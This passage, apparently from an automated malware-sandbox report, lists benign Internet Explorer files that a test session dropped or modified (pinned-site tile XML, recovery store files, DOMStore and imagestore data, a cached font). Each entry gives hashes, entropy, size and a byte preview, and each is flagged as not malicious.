                                                                                                                                                                                                                                                          Preview: <root></root>
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\URW0GA4Q\contextual.media[1].xml
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):2994
                                                                                                                                                                                                                                                          Entropy (8bit):4.9318500984758815
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:LK0K0K0K0p0p40p0I0I0IdP0SP0SP0SP0SPaK0SPaKpl0SPaKpl0SPaKpl0SPaKb:2fffII4IFFFdPfPfPfPfPaKfPaKplfP5
                                                                                                                                                                                                                                                          MD5:239C136FE9F89D9906FEB006029BCB0A
                                                                                                                                                                                                                                                          SHA1:74AD6688BAA9F9B1970154575F2715C4913A68D3
                                                                                                                                                                                                                                                          SHA-256:A1E1146ED0F00A5FB53E4E3CEE86EE3372E213DAC7A57EB1E64EED51E75E413B
                                                                                                                                                                                                                                                          SHA-512:E6DBFCC79DC2AFB023051F4DBAD9165C6C9274463B3441649792E0BDB3A424628715C71325911845977D58A18944775E48C29E485EB48B7004D9857E8832D116
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview: <root></root><root><item name="HBCM_BIDS" value="{}" ltime="1516958688" htime="30867322" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1516958688" htime="30867322" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1516958688" htime="30867322" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1516958688" htime="30867322" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1517158688" htime="30867322" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1517158688" htime="30867322" /><item name="mntest" value="mntest" ltime="1519198688" htime="30867322" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1517158688" htime="30867322" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1521598688" htime="30867322" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1521598688" htime="30867322" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1521598688" htime="30867322" /><item name="mntest" value="mntest" ltime="1521718688" htime="30867322"
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{9561B4B9-6B6D-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                                                                                                                                          Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:Microsoft Word Document
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):66792
                                                                                                                                                                                                                                                          Entropy (8bit):2.0884766627456495
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:rIJr6UHbHdH5HsHbHEHJHSHAH3HZuH4KftqHSGHwdHrL:Qut3dL
                                                                                                                                                                                                                                                          MD5:DC92D740708B49493AFF34D72EE3945A
                                                                                                                                                                                                                                                          SHA1:FD18FF4852AAC9E8435DB873CFCF690C3809B598
                                                                                                                                                                                                                                                          SHA-256:2CC691B5DB2CC11B36ACC6D44B5BCED72DDCBA073C203AF7A6127B614266B0DE
                                                                                                                                                                                                                                                          SHA-512:1E594D8B81FE2FE6A392EAA5EF537C221176430B40C7A265A9A83CD3D34EDF45B40B5669BFC8D446E5B24735986CB2322FF9EA3925F7834EB203732FC6852230
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{9561B4BB-6B6D-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                                                                                                                                          Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:Microsoft Word Document
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):195430
                                                                                                                                                                                                                                                          Entropy (8bit):3.5818477291386617
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3072:L3Z/2BfcYmu5kLTzGt5Z/2Bfc/mu5kLTzGt8:iov
                                                                                                                                                                                                                                                          MD5:5868D37E03CFCA7E397D0D2131CFB655
                                                                                                                                                                                                                                                          SHA1:A61CC463F0870DCA9F7EF9F3E297FE0F11CB8202
                                                                                                                                                                                                                                                          SHA-256:4B4B73F4391C38DF2C5424B08E06280EC5F79FB11B450407B5E636A6AFA50F13
                                                                                                                                                                                                                                                          SHA-512:F77179B51E1BA63B96EDB7BD8BECAFCDC47FC83D9187AD24B7A362079571772EC81490BA4BD5F7AD23C814029B767B83039443657CA9E5D5E3C89D7484E7A98C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A4019755-6B6D-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                                                                                                                                          Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:Microsoft Word Document
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):27400
                                                                                                                                                                                                                                                          Entropy (8bit):1.8459010198616825
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:r/uZRrQS6kBSxFjF2EkWzMaYCEhYxEhsCA:r/uZRrQS6kkxFjF2EkWzMaYCwYxwsCA
                                                                                                                                                                                                                                                          MD5:0B2A2DF2E49454B078172459C3E85848
                                                                                                                                                                                                                                                          SHA1:F93951D5B6E543691FB72A0453CB3F1B461E7941
                                                                                                                                                                                                                                                          SHA-256:B895D08C65CF0ECB8EDBCB20081AA97C5027E3B429DF800674E8A69668080645
                                                                                                                                                                                                                                                          SHA-512:FA871C7628BB2C395DDEEE8C2D2AE29EACF0F9E0C4A2BA5F68E37411EA103B1C1698A20CBE78B961640BFEAA323371D2188918552B880F11DD3CA96362A89BBE
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{BA083ADC-6B6D-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                                                                                                                                          Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:Microsoft Word Document
                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                          Size (bytes):19032
                                                                                                                                                                                                                                                          Entropy (8bit):1.5913696142442852
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:IwvGcprCGwpa5G4pQ1GrapbSbrGQpBaGHHpccsTGUpQdhGcpm:rlZqQb6lBSbFjh2ck6dg
                                                                                                                                                                                                                                                          MD5:F14FC28E6828643B7A92F3A67D5E2548
                                                                                                                                                                                                                                                          SHA1:90D1EAFAFD23CC3A7DE863A83325B6ED7BF6436A
                                                                                                                                                                                                                                                          SHA-256:FEC0CAE796436ED2338E0E86BD61BDFA08968F776BC80492BF63CEC7985DE0A6
                                                                                                                                                                                                                                                          SHA-512:D672A1074BD1C2ED808EA8BF543B0F9C627B5FF73AC6987C92EB92E1C81E54A7E5D3373D376DA474B809757D65C289EC5F498040C82DD5AC1FBF6B9843382741
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                                                                                                                                                                                                                          Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):656
                                                                                                                                                                                                                                                          Entropy (8bit):5.075898445633359
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:TMHdNMNxOEq1zR1mnWimI002EtM3MHdNMNxOEq1zKumnWimI00OYGVbkEtMb:2d6NxO3z7mSZHKd6NxO3zdmSZ7YLb
                                                                                                                                                                                                                                                          MD5:7FDCA3A9B491C2942C4D69915DF3FE28
                                                                                                                                                                                                                                                          SHA1:0BA54F9D6B4FD7995CE9073F2263124DB8036D86
                                                                                                                                                                                                                                                          SHA-256:FDC51F9113EED8C63608B56CA219FAEF96F3140F316D390E16040EA95F3DE090
                                                                                                                                                                                                                                                          SHA-512:6DB2DE28D928D597C17633D08887B44B82B41E2D54862BEDB87A27B8F7B61BD596B2C27310D917B1418CEFBF015CC4BD32018AAA353B53F9FB056CEA43D898FD
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x6ba6afc4,0x01d6ff7a</date><accdate>0x6ba6afc4,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x6ba6afc4,0x01d6ff7a</date><accdate>0x6ba9120d,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                                                                                                                                                                                                                          Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):653
                                                                                                                                                                                                                                                          Entropy (8bit):5.111199737646001
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:TMHdNMNxe2kB7zI7mnWimI002EtM3MHdNMNxe2kB7zI7mnWimI00OYGkak6EtMb:2d6NxrAzsmSZHKd6NxrAzsmSZ7Yza7b
                                                                                                                                                                                                                                                          MD5:D1DF01B2AC27FB5990C8D8F4F2AFB00E
                                                                                                                                                                                                                                                          SHA1:AB0036D280353795E08E20FAF7CCB6B11C25E0FD
                                                                                                                                                                                                                                                          SHA-256:07AB7C5B7A3062D05E0A10F67A42F96AF72FD7B72B247A31210199430F4F9FAA
                                                                                                                                                                                                                                                          SHA-512:30FBD75992F08ADBDF2DBA891428C1D0390AD6C84BCE1406EA88963EF2B25AE29DBECE902DBF45FDC665FBAD4F9F11EC40F86B443C0215B0A094E6D8ED5EB511
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x6b9f88ad,0x01d6ff7a</date><accdate>0x6b9f88ad,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x6b9f88ad,0x01d6ff7a</date><accdate>0x6b9f88ad,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                                                                                                                                                                                                                          Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):662
                                                                                                                                                                                                                                                          Entropy (8bit):5.103295488826997
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:TMHdNMNxvL5uzKumnWimI002EtM3MHdNMNxvL5uzKumnWimI00OYGmZEtMb:2d6NxvozdmSZHKd6NxvozdmSZ7Yjb
                                                                                                                                                                                                                                                          MD5:A4F3734C49E1422D1AD1D74E9D29D6A5
                                                                                                                                                                                                                                                          SHA1:63E274CF7DE0E6A2098002269BA67BD273B16139
                                                                                                                                                                                                                                                          SHA-256:927A90EE78530ED3E0E29187C2777DEB8E8954C44CC45CDF145AA9DACE74BF50
                                                                                                                                                                                                                                                          SHA-512:D866849E70B67DC4ECD528A898A59A4B74D6A48FD13E358ACB77A7B6D06F38ECDDBA5C281417D5AC570856D16988A2445787E54CD445F33C20D616B8B80FE4FC
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x6ba9120d,0x01d6ff7a</date><accdate>0x6ba9120d,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x6ba9120d,0x01d6ff7a</date><accdate>0x6ba9120d,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                                                                                                                                                                                                                          Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):647
                                                                                                                                                                                                                                                          Entropy (8bit):5.077798665112223
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:TMHdNMNxi5XnWimI002EtM3MHdNMNxi5XnWimI00OYGd5EtMb:2d6NxqXSZHKd6NxqXSZ7YEjb
                                                                                                                                                                                                                                                          MD5:B8F001CBE0B176A7AAECEFD0564A9A6B
                                                                                                                                                                                                                                                          SHA1:7EF7C8A3B31AD7EA8739C2779A22CCBDADED3A43
                                                                                                                                                                                                                                                          SHA-256:F12ADF35DCA40DAEC20544D2BD61EF87158F6D0D904509FBDC044E7372473E02
                                                                                                                                                                                                                                                          SHA-512:D445076B7CFA275DF2D3FDD1F4A382117AD046D04209D7DC7DBABCEC3EC84E4BD97F41080056F64A8E1FAE2A6579160650DA6FA331CDE6D4364339D2CC9F8418
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x6ba1eb09,0x01d6ff7a</date><accdate>0x6ba1eb09,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x6ba1eb09,0x01d6ff7a</date><accdate>0x6ba1eb09,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                                                                                                                                                                                                                                          Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):656
                                                                                                                                                                                                                                                          Entropy (8bit):5.11656010923755
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:TMHdNMNxhGw5uzKumnWimI002EtM3MHdNMNxhGw5uzKumnWimI00OYG8K075EtMb:2d6NxQ1zdmSZHKd6NxQ1zdmSZ7YrKajb
                                                                                                                                                                                                                                                          MD5:C83832141CD35D87828F06C31BFB2A75
                                                                                                                                                                                                                                                          SHA1:6A6BBC37A6559999434CAAA3AED18A6B02A64978
                                                                                                                                                                                                                                                          SHA-256:D0DF8E4410CEF86142724C79A2D5E955D7CB7BE6F6245AA85B22AA92C8C761E9
                                                                                                                                                                                                                                                          SHA-512:BD48E3E90B6B1894BD3BEEE6A91E2A6CE6BEEBA9F7ED19C4EDB634839609D67632EF3F9A503076DDD81888FB517F56BC9DE4251D8C9F969E395DEAE509F46E71
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6ba9120d,0x01d6ff7a</date><accdate>0x6ba9120d,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6ba9120d,0x01d6ff7a</date><accdate>0x6ba9120d,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                                                                                                                                                                                                                                          Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):653
                                                                                                                                                                                                                                                          Entropy (8bit):5.063908012770798
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:TMHdNMNx0nq1zR1mnWimI002EtM3MHdNMNx0nq1zR1mnWimI00OYGxEtMb:2d6Nx0qz7mSZHKd6Nx0qz7mSZ7Ygb
                                                                                                                                                                                                                                                          MD5:E17ECB74D405F334112635F17E011C8F
                                                                                                                                                                                                                                                          SHA1:890EFF49DD71C94A911DC4D84A83139DA872732A
                                                                                                                                                                                                                                                          SHA-256:DE4C0DD53888737C2BA64AA8BF3B191199A497D0365770DFCEF556C561E91B0B
                                                                                                                                                                                                                                                          SHA-512:DF6A3DE128D691085076D2610B2462F6CA815BC56EF1ED9591E7D5D59A9C8BAD3922F181FF249BA82BA1B837997A585D1406F3EBBEB42191F059075E0FB837C2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x6ba6afc4,0x01d6ff7a</date><accdate>0x6ba6afc4,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x6ba6afc4,0x01d6ff7a</date><accdate>0x6ba6afc4,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                                                                                                                                                                                                                                          Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):656
                                                                                                                                                                                                                                                          Entropy (8bit):5.1143284396152575
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:TMHdNMNxx7aidnWimI002EtM3MHdNMNxx7aR1mnWimI00OYG6Kq5EtMb:2d6NxFaidSZHKd6NxFa7mSZ7Yhb
                                                                                                                                                                                                                                                          MD5:06E2041C9927E0D2720E0B4EFD5FF3BD
                                                                                                                                                                                                                                                          SHA1:AAD0CD5269AE9731AA78E06EE2D9042FA50326E0
                                                                                                                                                                                                                                                          SHA-256:3F3DBDD94B2CEEB5E9DB36936D280E596B6D8A0E92EBF20F6C484189E824549D
                                                                                                                                                                                                                                                          SHA-512:4CAB4BC74013ACC02EFD6F284A2F948887D0198B58EF2E40146014FDEBEB92EE37E13B41374B9636CE0B6430FCE95A25A29FAD98BFF8E187CE909A02B0C7085A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x6ba44d60,0x01d6ff7a</date><accdate>0x6ba44d60,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x6ba44d60,0x01d6ff7a</date><accdate>0x6ba6afc4,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                                                                                                                                                                                                                                          Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):659
                                                                                                                                                                                                                                                          Entropy (8bit):5.074272363668935
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:TMHdNMNxc5XnWimI002EtM3MHdNMNxc5XnWimI00OYGVEtMb:2d6NxMXSZHKd6NxMXSZ7Ykb
                                                                                                                                                                                                                                                          MD5:AFA9B39FCF2B41C7589DA1FA9FC1B7E0
                                                                                                                                                                                                                                                          SHA1:DB74637B5CF9D3E9DA984A247EF93639E5E60293
                                                                                                                                                                                                                                                          SHA-256:0490A2867434787656F7E4EA0EB9C93B55AAAFB2E954F22AB6526B3F8E26E04B
                                                                                                                                                                                                                                                          SHA-512:A98C8C58F57530742EA7EEA18E44AF5D8F54D843730790D4396E7D18ED091A55BC0E3E021673EE76ED6A033EB1DE63CB368F75226ACEA77DB5EF948273E79F9F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x6ba1eb09,0x01d6ff7a</date><accdate>0x6ba1eb09,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x6ba1eb09,0x01d6ff7a</date><accdate>0x6ba1eb09,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                                                                                                                                                                                                                                          Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):653
                                                                                                                                                                                                                                                          Entropy (8bit):5.0634321728463405
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:TMHdNMNxfn5XnWimI002EtM3MHdNMNxfn5XnWimI00OYGe5EtMb:2d6NxxXSZHKd6NxxXSZ7YLjb
                                                                                                                                                                                                                                                          MD5:0F12E016550A554C90F79E9386CECC90
                                                                                                                                                                                                                                                          SHA1:5A22B7FCB4D1C1156AD93A6FAA99DA78352B16FA
                                                                                                                                                                                                                                                          SHA-256:3FA845A0CD7031BC037A7911EDABCCD28F8D63E3C6E98884341D2C7459F6465D
                                                                                                                                                                                                                                                          SHA-512:F3C277855F69742EE756CC0B23EEC8A0312BB5F493ACF066F83BF0C37CEAA3EE40CEE2679321021B49B5FB84A0289268D4097DC9934E5F48F4064CD34F5894CE
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x6ba1eb09,0x01d6ff7a</date><accdate>0x6ba1eb09,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x6ba1eb09,0x01d6ff7a</date><accdate>0x6ba1eb09,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\gee00pr\imagestore.dat
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):934
                                                                                                                                                                                                                                                          Entropy (8bit):7.036435383616078
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:u6tWaF/6easyD/iCHLSWWqyCoTTdTc+yhaX4b9upGAr:u6tWu/6symC+PTCq5TcBUX4bOr
                                                                                                                                                                                                                                                          MD5:0486F8DDD9FA081F5E60461DFB32BECC
                                                                                                                                                                                                                                                          SHA1:F70571B3FF89358DCA01DD22701C5B78A343B606
                                                                                                                                                                                                                                                          SHA-256:F32552558C853FD964059380936D1DB67B7220F9DFD8C52B3B9145E8968FA460
                                                                                                                                                                                                                                                          SHA-512:711F59654D8ECFA931D1A703A5A8ADBB129DD1FE35D9D59EF062A33888104B06C9E4E6FD2EB284DBB7877D30138837DB28B091BFD8A2A0067D68F9BA346A09D7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview: E.h.t.t.p.s.:././.s.t.a.t.i.c.-.g.l.o.b.a.l.-.s.-.m.s.n.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.h.p.-.n.e.u./.s.c./.2.b./.a.5.e.a.2.1...i.c.o......PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D.*.M.*.............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`. ... ...........q.#`....q.#`....
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\4996b9[1].woff
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:Web Open Font Format, TrueType, length 45633, version 1.0
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):45633
                                                                                                                                                                                                                                                          Entropy (8bit):6.523183274214988
                                                                                                                                                                                                                                                          Encrypted:false
